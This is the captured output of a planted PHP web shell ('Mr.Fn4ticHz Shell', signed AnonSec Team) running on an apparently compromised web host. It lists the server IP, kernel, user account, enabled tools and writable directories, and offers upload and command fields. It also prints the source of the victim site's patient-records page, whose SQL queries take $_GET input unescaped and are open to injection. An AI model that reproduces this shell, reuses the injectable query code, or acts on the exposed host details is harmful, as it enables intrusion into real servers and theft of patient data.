Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.138.69.163
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in//show_addas.php
  <?php
session_start();
require_once('dbconnection.php');
include 'patient_menu.php';
include 'header.php';
		$sql ="SELECT * FROM addaspatient WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    $sql1 ="SELECT * FROM site_users WHERE entered_by='$rs[entered_by]'";
		$qsql1 = mysqli_query($con,$sql1);
		if($rs1 = mysqli_fetch_array($qsql1))
		{
		        $sql2 ="SELECT * FROM admin WHERE id='$rs[hospitalid]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($rs2 = mysqli_fetch_array($qsql2))
		{
		    echo "

		    <div class='content-wrapper'>
    <!-- Content Header (Page header) -->
    <section class='content-header'>
    <div class='center'>
    <table  width='100%'>
 <h3 align='center'>Add New Documents</h3>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Name of Hospital: </td>
<td width='50%'>$rs2[hsname]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Type of visit  :  </td>
<td width='50%'>$rs[typevisit]</td>
</tr>
<tr>
<td width='50%'> &nbsp;  &nbsp; &nbsp; &nbsp; Case Type:  </td>
<td width='50%'>$rs[casetype]</td>
</tr>
<tr>
<td width='50%'> &nbsp;  &nbsp; &nbsp; &nbsp; Created By:  </td>
<td width='50%'>$rs1[name]</td>
</tr>
</table>
</fieldset>

</div>
 ";
		}
		}
		}
		?>
		
		  <html>
           <head>
               <style>
                     
       .center {
   border: 1px solid grey;
   text-align:;

</style>
               
           </head>
    <body>
         <?php ?>
  
		</body>
  </html>

Anon7 - 2022
AnonSec Team